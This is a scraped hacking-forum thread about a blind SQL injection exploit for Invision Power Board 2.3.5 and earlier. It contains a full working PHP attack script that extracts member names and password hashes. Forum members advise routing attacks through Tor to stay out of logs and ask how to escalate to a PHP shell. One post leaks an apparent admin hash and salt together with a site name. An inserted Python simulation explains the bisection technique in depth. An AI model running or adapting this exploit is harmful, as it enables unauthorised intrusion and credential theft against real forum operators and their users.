www.waraxe.us Forum Index -> Invision Power Board -> IPB <= 2.3.5 sql injection exploit (new version 1.2) (page 4 of 6)

Posted: Thu Jan 22, 2009 5:34 pm
OpenMASK (Regular user, joined Jan 22, 2009, 6 posts)

waraxe wrote:
It's probably vulnerable, because 2 tests are passing, but for some reason an SQL error occurs in a later phase. Why, I have no idea. You must debug the script (use echo, print or similar in the right places) and try to find out the server response. If needed, there can be more ways to fetch data from the same SQL injection. Just be creative :)

Thank you very much, man!! :)))

Posted: Thu Feb 26, 2009 3:45 am
AciddTripp (Beginner, joined Feb 26, 2009, 1 post)

Thanks for the exploit, works great.

One question, what is the risk of my IP address being shown in any logs if I extract a large amount of hashes with this exploit? Or should I be running with an anonymous proxy to protect myself?

Posted: Thu Feb 26, 2009 2:16 pm
waraxe (Site admin, Estonia, Tartu, joined May 11, 2004, 2407 posts)

AciddTripp wrote:
Thanks for the exploit, works great.

One question, what is the risk of my IP address being shown in any logs if I extract a large amount of hashes with this exploit? Or should I be running with an anonymous proxy to protect myself?

It's wise to hide your IP, of course. From the exploit source:

Code:

# Proxy settings
# Be sure to use proxy :)
//$proxy_ip_port = '127.0.0.1:8118';
//$proxy_user_password = 'someuser:somepassword';


Just uncomment the needed lines and use a proxy. My suggestion is Tor:

http://vidalia-project.net

Tor is slow, but bulletproof for most operations :)

Posted: Fri May 01, 2009 12:26 pm
VERTIGO (Advanced user, joined Sep 25, 2008, 87 posts)

Hmm, waraxe, one question.

I tested one forum, it's IPB:

www.site.com\index.php?act=xmlout&do=check-display-name&name=%2527
and it has an IPS error. Will the exploit work on this forum, because the URL does not have "forums" in it?

Posted: Sun May 03, 2009 5:47 pm
waraxe (Site admin, Estonia, Tartu, joined May 11, 2004, 2407 posts)

VERTIGO wrote:
Hmm, waraxe, one question.

I tested one forum, it's IPB:

www.site.com\index.php?act=xmlout&do=check-display-name&name=%2527
and it has an IPS error. Will the exploit work on this forum, because the URL does not have "forums" in it?

As long as the specific AJAX function is accessible and the SQL injection really exists, this exploit should work.

Posted: Mon May 04, 2009 12:06 am
ba9ba9 (Active user, joined Feb 11, 2009, 46 posts)

waraxe wrote:
VERTIGO wrote:
Hmm, waraxe, one question.

I tested one forum, it's IPB:

www.site.com\index.php?act=xmlout&do=check-display-name&name=%2527
and it has an IPS error. Will the exploit work on this forum, because the URL does not have "forums" in it?

As long as the specific AJAX function is accessible and the SQL injection really exists, this exploit should work.

Is there any method to get the prefix of a forum, because ibf_ doesn't work?

Posted: Mon Aug 17, 2009 5:17 pm
nuker (Active user, joined Aug 16, 2009, 39 posts)

Hi,

Can this exploit be modified so you can get the admin login logs? That would be useful, as it shows the number of characters and the last character of the password, so it's a little easier to figure out.

Thank you.
Modification

Posted: Sun Aug 23, 2009 3:55 pm
RG007145 (Active user, joined May 04, 2008, 27 posts)

A quick modification (made in a big hurry) to fetch the login username given people's IDs:

Note: It says "finding hash" but it's finding the username. And [a-f] means [A-z], since I'm so lazy.

Note 2: A "0" in the username means a space. One or multiple "0"s after the username mean it's done.

Code:

<?php
error_reporting(E_ALL);
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// IPB <= 2.3.5 sql injection exploit
// Version 1.2
// written by Janek Vind "waraxe"
// Estonia, Tartu
// http://www.waraxe.us/
// 24. september 2008
// based on DarkFig's advisory
// http://acid-root.new.fr/?0:18
//
// FEATURES:
// 1. Fetching algorithm optimized for speed
// 2. Attack goes through $_POST, so no suspicious logs
// 3. Pretesting saves time if IPB is not vulnerable
// 4. curl extension autoloading
// 5. can work with multiple ID-s
// 6. log format compatible with passwordspro
//
// More useful tools: http://www.waraxe.us/tools/
// Waraxe forums: http://www.waraxe.us/forums.html
//
// NB! This exploit is meant to be run as php CLI!
// http://www.php.net/features.commandline
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//=====================================================================
$url = 'http://localhost/ipb/';
$id_start = 1;// starting user ID, default value "1" is admin's ID
$id_end = 10;// ending user ID
$prefix = 'ibf_';// IPB table prefix, default is "ibf_"
# Proxy settings
# Be sure to use proxy :)
//$proxy_ip_port = '127.0.0.1:8118';
//$proxy_user_password = 'someuser:somepassword';
$outfile = './ipblog.txt';// Log file
//======================================================================
///////////////////////////////////////////////////////////////////////
// Don't mess below this line, unless you know the stuff ;)
///////////////////////////////////////////////////////////////////////
//=====================================================================
///////////////////////////////////////////////////////////////////////
// Load curl at runtime if it is not compiled in. dl() is only available to the
// CLI/CGI SAPIs, and 'php_curl.dll' is the Windows file name of the extension.
if(!extension_loaded('curl'))
{
   if(!dl('php_curl.dll'))
   {
      die("Curl extension not loaded!\n Fatal exit ...\n");
   }
   else
   {
      echo "Curl loading success\n";
   }
}
//=====================================================================
$cli = php_sapi_name() === 'cli';
//=====================================================================
// Warning, if executed from webserver
//=====================================================================
if(!$cli)
{
   if(!isset($_REQUEST['wtf-is-cli']))
   {
      echo "<html><head><title>Attention!</title></head>\n";
      echo "<body><br /><br /><center>\n";
      echo "<h1>Warning!</h1>\n";
      echo "This exploit is meant to be used as php CLI script!<br />\n";
      echo "More information:<br />\n";
      echo "<a href=\"http://www.google.com/search?hl=en&q=php+cli+windows\" target=\"_blank\">http://www.google.com/search?hl=en&q=php+cli+windows</a><br />\n";
      echo "Still, you can try to run it from webserver.<br />\n";
      echo "Just press the button below and prepare for long waiting<br />\n";
      echo "And learn to use php CLI next time, please ...<br />\n";
      echo "<form method=\"get\">\n";
      echo "<input type=\"submit\" name=\"wtf-is-cli\" value=\"Let me in, i don't care\">\n";
      echo "</form>\n";
      echo "</center></body></html>\n";
      exit;
   }
   else
   {
      // Let's try to maximize our chances without CLI
      @set_time_limit(0);
   }
}
//=====================================================================
xecho("Target: $url\n");
xecho("Sql table prefix: $prefix\n");
xecho("Testing target URL ... \n");
test_target_url();
xecho("Target URL seems to be valid\n");
add_line("Target: $url");

for($i = $id_start; $i <= $id_end; $i ++)
{
   echo "Testing ID $i\n";
   if(!test_target_id($i))
   {
      echo "ID $i not valid, passing ...\n";
      continue;
   }
   echo "ID $i validated\n";
   
   $hash = get_hash($i);
   $salt = '';
   $line = "$i:$hash:$salt";
   add_line($line);

   xecho("\n------------------------------------------\n");
   xecho("User ID: $i\n");
   xecho("Hash: $hash\n");
   xecho("Salt: $salt");
   xecho("\n------------------------------------------\n");
}

add_line("------------------------------------------");

xecho("\nQuestions and feedback - http://www.waraxe.us/ \n");
die("See ya! :) \n");
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
function test_target_url()
{
   global $url;
   
   $post = 'act=xmlout&do=check-display-name&name=somethingfoobarkind%2527 OR 1=1-- ';
   $buff = trim(make_post($url, $post, '', $url));

   if($buff === 'notfound')
   {
      die('Target is patched? Exiting ...');
   }
   
   if($buff !== 'found')
   {
      die('Invalid response, target URL not valid? Exiting ...');
   }
}
//////////////////////////////////////////////////////////////////////
function test_target_id($id)
{
   global $url, $prefix;
   
   $post = 'UNION SELECT 1,1 FROM ' . $prefix . 'members_converge WHERE converge_id=' . $id . ' AND LENGTH(converge_pass_hash)=32';

   return test_condition($post);
}
///////////////////////////////////////////////////////////////////////
function get_hash($id)
{
   // Still 32 iterations, the length of the MD5 hash the original script fetched.
   // For a shorter username every position past its end comes back as "0" (see Note 2).
   $len = 32;
   $out = '';
   
   xecho("Finding hash ...\n");
   
   for($i = 1; $i < $len + 1; $i ++)
   {
      $ch = get_hashchar($i, $id);
      xecho("Got pos $i --> $ch\n");
      $out .= "$ch";
      xecho("Current hash: $out \n");
   }
   
   xecho("\nFinal hash for ID $id: $out\n\n");
   
   return $out;
}
///////////////////////////////////////////////////////////////////////
function get_hashchar($pos, $id)
{
   global $prefix;

   $char = '';
   // Boolean oracle on one byte of the member name: ORD(SUBSTR(name,$pos,1)) <op> <value>.
   // ORD('') is 0 for positions past the end of the name, which the search below turns into "0".
   $pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members WHERE id=$id AND ORD(SUBSTR(name,$pos,1))";

   // First let's determine, if it's number or letter (%253e is decoded twice by IPB into ">")
   $post = $pattern . '%253e57';
   $letter = test_condition($post);
   
   if($letter)
   {
      // 65..122 covers A-Z, a-z and the punctuation between them; any byte outside
      // this band or 48..57 is mapped onto the nearest band edge (see Note 1)
      $min = 65;
      $max = 122;
      xecho("Char to find is [a-f]\n");
   }
   else
   {
      $min = 48;
      $max = 57;
      xecho("Char to find is [0-9]\n");
   }

   $curr = 0;
   
   while(1)
   {
      $area = $max - $min;
      if($area < 2 )
      {
         $post = $pattern . "=$max";
         $eq = test_condition($post);
         
         if($eq)
         {
            $char = chr($max);
         }
         else
         {
            $char = chr($min);
         }
         
         break;
      }
     
      $half = intval(floor($area / 2));
      $curr = $min + $half;
     
      $post = $pattern . '%253e' . $curr;
     
      $bigger = test_condition($post);
     
      if($bigger)
      {
         $min = $curr;
      }
      else
      {
         $max = $curr;
      }

      xecho("Current test: $curr-$max-$min\n");
   }
   
   return $char;
}
///////////////////////////////////////////////////////////////////////
function test_condition($p)
{
   global $url;
   
   $bret = false;
   $maxtry = 10;
   $try = 1;
     
   $pattern = 'act=xmlout&do=check-display-name&name=%%2527 OR 1=%%2522%%2527%%2522 %s OR 1=%%2522%%2527%%2522-- ';
   $post = sprintf($pattern, $p);
   
   while(1)
   {
      $buff = trim(make_post($url, $post, '', $url));

      if($buff === 'found')
      {
         $bret = true;
         break;
      }
      elseif($buff === 'notfound')
      {
         break;
      }
      elseif(strpos($buff, '<title>IPS Driver Error</title>') !== false)
      {
         die("Sql error! Wrong prefix?\nExiting ... ");
      }
      else
      {
         xecho("test_condition() - try $try - invalid return value ...\n");
         $try ++;
         if($try > $maxtry)
         {
            die("Too many tries - exiting ...\n");
         }
         else
         {
            xecho("Trying again - try $try ...\n");
         }
      }
   }
   
   return $bret;
}
///////////////////////////////////////////////////////////////////////
function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)
{
   $ch = curl_init();
   $timeout = 120;
   curl_setopt ($ch, CURLOPT_URL, $url);
   curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
   curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
   curl_setopt($ch, CURLOPT_POST, 1);
   curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
   curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)');
   
   if(!empty($GLOBALS['proxy_ip_port']))
   {
      curl_setopt($ch, CURLOPT_PROXY, $GLOBALS['proxy_ip_port']);
     
      if(!empty($GLOBALS['proxy_user_password']))
      {
         curl_setopt($ch, CURLOPT_PROXYUSERPWD, $GLOBALS['proxy_user_password']);
      }
   }
   
   if(!empty($cookie))
   {
      curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
   }
 
   if(!empty($referer))
   {
      curl_setopt ($ch, CURLOPT_REFERER, $referer);
   }

   if($headers === TRUE)
   {
      curl_setopt ($ch, CURLOPT_HEADER, TRUE);
   }
   else
   {
      curl_setopt ($ch, CURLOPT_HEADER, FALSE);
   }

   $fc = curl_exec($ch);
   curl_close($ch);
   
   return $fc;
}
///////////////////////////////////////////////////////////////////////
function add_line($line)
{
   global $outfile;
   
   $line .= "\n";
   $fh = fopen($outfile, 'ab');
   fwrite($fh, $line);
   fclose($fh);
   
}
///////////////////////////////////////////////////////////////////////
function xecho($line)
{
   if($GLOBALS['cli'])
   {
      echo "$line";
   }
   else
   {
      $line = nl2br(htmlspecialchars($line));
      echo "$line";
   }
}
//////////////////////////////////////////////////////////////////////
?>
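The extraction loop in the script above is a boolean blind injection: every request answers only "found" or "notfound", and the script bisects over ORD(SUBSTR(name,pos,1)) to recover one byte at a time. The following is an added example, not code from the page, from waraxe or from RG007145. It models that loop in Python without touching any server: a constructed in-memory table stands in for ibf_members, the FakeOracle class answers the way the check-display-name call does, build_post_body shows the double URL encoding (%2527, %253e) the script relies on, find_ord does the general 7-request bisection with end-of-string detection (ORD('') is 0), and page_style_char reproduces the posted [0-9]/[A-z] shortcut so its two side effects can be seen: a space comes back as "0" and an "@" comes back as "A". All names, the table contents and the member IDs are assumptions made for the illustration.

```python
"""Blind boolean-based extraction modelled on the IPB exploit posted above.

Added example, not code from the original page, from waraxe or from RG007145.
No server is contacted: a constructed in-memory table stands in for ibf_members
and FakeOracle answers the way the check-display-name call does ('found' when
the injected condition is true, 'notfound' when it is false).
"""
from urllib.parse import unquote


class FakeOracle:
    """Plays the role of test_condition(): is ORD(SUBSTR(name,pos,1)) op value true?"""

    def __init__(self, members):
        self.members = members    # {member id: display name}, constructed sample data
        self.requests = 0         # how many simulated HTTP POSTs were needed

    def ask(self, uid, pos, op, value):
        self.requests += 1
        name = self.members.get(uid)
        if name is None:
            return False          # the UNION yields no row, i.e. 'notfound'
        ch = name[pos - 1] if pos <= len(name) else ""
        o = ord(ch) if ch else 0  # MySQL: ORD('') = 0, so 0 marks the end of the string
        return o > value if op == ">" else o == value


def build_post_body(prefix, uid, pos, op, value):
    """The POST body the exploit sends.  Quote and '>' are URL-encoded twice
    (%2527, %253e) because IPB decodes the parameter a second time."""
    cond = (f"UNION SELECT 1,1 FROM {prefix}members WHERE id={uid} "
            f"AND ORD(SUBSTR(name,{pos},1)){op}{value}").replace(">", "%253e")
    return ("act=xmlout&do=check-display-name&name="
            "%2527 OR 1=%2522%2527%2522 " + cond + " OR 1=%2522%2527%2522-- ")


def as_seen_by_database(post_body):
    """Decode the name parameter twice to see the fragment that reaches the SQL query."""
    return unquote(unquote(post_body.split("&name=", 1)[1]))


def find_ord(oracle, uid, pos, lo=0, hi=127):
    """General bisection: exactly 7 requests for any 7-bit value, no class guessing."""
    while lo < hi:                # invariant: lo <= ORD(...) <= hi
        mid = (lo + hi) // 2
        if oracle.ask(uid, pos, ">", mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_name(oracle, uid, max_len=255):
    """Read the name byte by byte and stop at the first ORD of 0 (end of string)."""
    out = []
    for pos in range(1, max_len + 1):
        o = find_ord(oracle, uid, pos)
        if o == 0:
            break
        out.append(chr(o))
    return "".join(out)


def page_style_char(oracle, uid, pos):
    """The posted modification's search: one request decides digit vs. 'letter',
    then it bisects inside 48..57 or 65..122.  Anything outside those bands
    (space, '@', '{', ...) is silently mapped onto the nearest band edge."""
    if oracle.ask(uid, pos, ">", 57):
        lo, hi = 65, 122
    else:
        lo, hi = 48, 57
    while hi - lo >= 2:
        mid = lo + (hi - lo) // 2
        if oracle.ask(uid, pos, ">", mid):
            lo = mid
        else:
            hi = mid
    return chr(hi) if oracle.ask(uid, pos, "=", hi) else chr(lo)


def extract_name_page_style(oracle, uid, length=32):
    """Fixed-length read as in the posted script; padding shows up as trailing '0's."""
    return "".join(page_style_char(oracle, uid, pos) for pos in range(1, length + 1))


if __name__ == "__main__":
    table = {1: "Admin User", 2: "j0hn_d0e", 3: "r@ot"}   # constructed sample data
    print(as_seen_by_database(build_post_body("ibf_", 1, 1, ">", 57)))
    oracle = FakeOracle(table)
    for uid in table:
        print(uid, repr(extract_name(oracle, uid)), repr(extract_name_page_style(oracle, uid, 12)))
    print("requests:", oracle.requests)
```

The general search costs a fixed 7 requests per byte plus 7 for the terminator (77 for "Admin User"), while the posted shortcut saves a request or two per character at the price of misreading every byte outside its two bands; against a real target the only way to tell "0 means space" from "0 means end" is to widen the range, which is what find_ord does.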

Posted: Mon Aug 24, 2009 3:21 am
nuker (Active user, joined Aug 16, 2009, 39 posts)

Nice, can you modify it so you can get the admin login logs with it?

Posted: Thu Oct 22, 2009 7:35 am
Meithal (Beginner, joined Oct 22, 2009, 3 posts)

Tere!

Is there any means to use this exploit to UPDATE a table? It's a question of LIFE or DEATH. Thank you!

Posted: Thu Oct 22, 2009 9:59 am
waraxe (Site admin, Estonia, Tartu, joined May 11, 2004, 2407 posts)

Meithal wrote:
Tere!

Is there any means to use this exploit to UPDATE a table? It's a question of LIFE or DEATH. Thank you!

Tere :)

In the case of the PHP/MySQL combination, stacked (multiple) SQL queries are not allowed. So you need an SQL injection vulnerability in an UPDATE query in order to manipulate a specific table in a writable manner.
My IPB exploit is based on an SQL injection in a SELECT query, so it is not able to UPDATE directly. But if you can fetch the admin hash(es) and they are crackable, then IPB admin level and finally PHP code level are possible (PHP shell). Which means that you can modify the SQL database from PHP.

Posted: Thu Oct 22, 2009 10:40 am
Meithal (Beginner, joined Oct 22, 2009, 3 posts)

OK, thanks. Of course the SQL shell doesn't allow updating the tables you need, but there are still the template bits, where there is a lot of PHP code. Let's go there ;)
not work

Posted: Wed Nov 04, 2009 12:21 pm
Doky (Beginner, joined Nov 04, 2009, 1 post)

Hi, not working...
The script generates hash & salt, but it doesn't work :(

------------------------------------------
User ID: 142348 (Root admin)
Hash: 00d2594a7a719d383ad178778951461b
Salt: UVe3'
------------------------------------------

www.netmozi.com

Not working, can't log in.. :S
Test please :D thx

Posted: Sat Nov 07, 2009 11:33 pm
RG007145 (Active user, joined May 04, 2008, 27 posts)

You're not allowed to post websites...

Posted: Thu Dec 10, 2009 1:09 am
AgentJ9 (Active user, joined Sep 07, 2008, 26 posts)

Does it still work? And what version of PHP will I need?